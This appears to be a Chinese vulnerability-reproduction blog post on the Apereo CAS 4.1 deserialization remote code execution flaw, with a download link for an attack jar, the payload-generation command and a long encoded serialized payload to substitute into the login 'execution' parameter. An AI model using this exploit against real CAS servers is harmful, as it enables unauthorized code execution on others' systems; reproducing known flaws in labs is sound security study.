本文主要是介绍Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞描述
Apereo CAS 是一个企业单点登录系统。CAS 尝试通过 Apache Commons Collections 库反序列化对象时存在问题,这导致了 RCE 漏洞。
漏洞复现及利用
工具下载
https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar
执行命令
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/yc"
69576052-1e15-41e9-8779-1d75cac0fe3e_AAAAIgAAABBvrhv%2Bq3TScSkEIPXCL6eaAAAABmFlczEyOAvX3IUxcf4qwN0nzU0wGdAq1Pym2Q%2FR4lx1FzCNudvOiux09imSakD57fzWQZbR0Er1HHx4mZweItkuVcx0HRInEzKE%2BPiBU4gNJ2VOKN%2B3sp3%2BdSLTZH6urog9Bx6u2%2BlKaxd55RGMu0EEAHMGAsaoblAv1pY%2B5EdohWXcIGn0C6yWPtWY2b7lstXDYzLmtrh6NNZrRVSUCTk13DBRuw%2FqYW2FuwPSnQKGqPuuwMzdHCwlZ%2FGI8pQqOZJjo2hOreJXf9u4U9fPMbbUh%2BYfEknpMW9gFpsw2b06%2FBPsHxdVl6n5TNvFuN%2B9riZuHI2DX5tKABIsQ4y1oXAuEpxCKqji1UVGuS01NFc7EoTL89F8MrC8AHnUXmB4mpLmVW0KAy2BsraDYiQTF8D93Qdrt0cBSFrOxKju62JuXqrion1zQa%2FYM1xnc46pR9V91QAL7GxHfSsPc4h1yiO0TMhwswjUzwzHRD768472U78EL55MhpMyn02GdfBpEhXNLjdgLGxdPbm86w7b2vPnwRkADS48D0i0VtFpvEicEMFJQS0FMNyxLso1aCaUUPOQV85X9%2BLeNlz7Ev1hzaGaLoBmH8qdMuQAQYFbkOFoYjHsQACkAqIC4n1cQZGdRpEKrzdFVls2%2B1I79%2BOC4jhoEJx%2F%2F%2BAJsO8inOboeihqWNMPsIbhftPd8OJZLSO4d2h8giz43Gv84KYyriEIUViKmhvcRWOIFgog2%2FVw%2FjdE7csHEs5TtqxuT4ID279ojj7buRJjWp%2FymSgROITWO6LVI7Q2scg9na3p9S4dpX1KHNWf8B7ruKzX5njE2ieQktIDS8%2F%2BITFBR7%2BRnRyTkoI%2BKadj862yBaFduU10kesl%2FcmSYVOWFkdC%2B4dk%2FAKDDmbbom4AB3uYh%2FE7VQoN8N5PpivdEYdYFGgdxDVVoLsnJgWk9%2Fvrr6n9HJl7njUuUrDYn3iH29IYU%2FMrNzB%2FPJ3V131WOs%2B6TMNUrWtmn%2Fl1I6Eg7qTuwQf%2B5yQ%2BVBW157LgEmyIVfVHidNUNB5Y9DW1ShXwD7hsQ5TMVKcUJ2oozCeezMO6gKa0sLge9NYPbXJZMADyFrjS0yUM9hmBp4Jh2WuW03cKZ9iyOGywrvhYtqFHcPpcJhJaY6TrItYGJoJqgpW5fHYLMHgmO4c6jFxZ0Mxk6iwNZtDEFXdjgaJohES7hlCoduiUx%2FDmFNbNvnSEeBdkGis3xzz4X5u5OSsarUf5osUvuBjWHzF4Nt5bnzNPd6BRjt9R%2FAhIAnE3n1Zei67ksQaqLfgxwm3sX366ZPX%2BctIxXmK8GdhEeq5mg6PBN21KlryBaewT1U%2FNo7rRpLG39qZij1U9CtSZ1TcO96lWXtS1nFGKMWagkSNKS3NeZO%2Fx9ZR3jm%2FMepWl61S9QUsJN2g924wIVzFgrubj5qqRaIYoHIW7rQji5insBvMyaTxeaHRBwh00qRZklbADSvwiuxx4WSM%2FGvpj2XK8pK6i0FTGHqIMeilVoA6MbG3RCSojZ%2BLRxMXDGJgPpu9D0HIKTJ5sl1v6ot%2Fm%2F8xntzKHKKmmNcfhfZ9Q2wPzKsYTqw%2BN8j%2FmzuAU5iCYva5l2RuPADEKk4kD5C7c48k3t%2FUBbHt3t0sLhGRJ0MSU95gE6PC90TQMSIRj%2BlNCCeZpyLHy578H0eXYi6ZPVj%2FyFiOpgdP0hw52y79xfBFM9UxwJeVdspxM%2FDD2gZMt8CuqVoot9RvROV74nzgOmEJRVowM%2FIpLbxmpYXDxSX%2B4F6qAXnBd%2FBvUbKys3hYHoZp7tu7nN5HkSr4ayLZUWciOu0zp2UsOxkQsNCl%2FzN2IwjG17D%2FlVXPJDe6pVPa%2BKh6wpVeXVEj4YYr%2BhBDmFA4MF0aAQEa4J0YNRsIVMw9DClb1H5%2FbIfzuYAoCuxluTD8SZcLrLxWMIaDhlVML0v%2FICTJwIyPfOFTnmFlx7aNM6QbOKHOs
将execution替换为payload即可
可以看到,命令已经执行成功
这篇关于Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
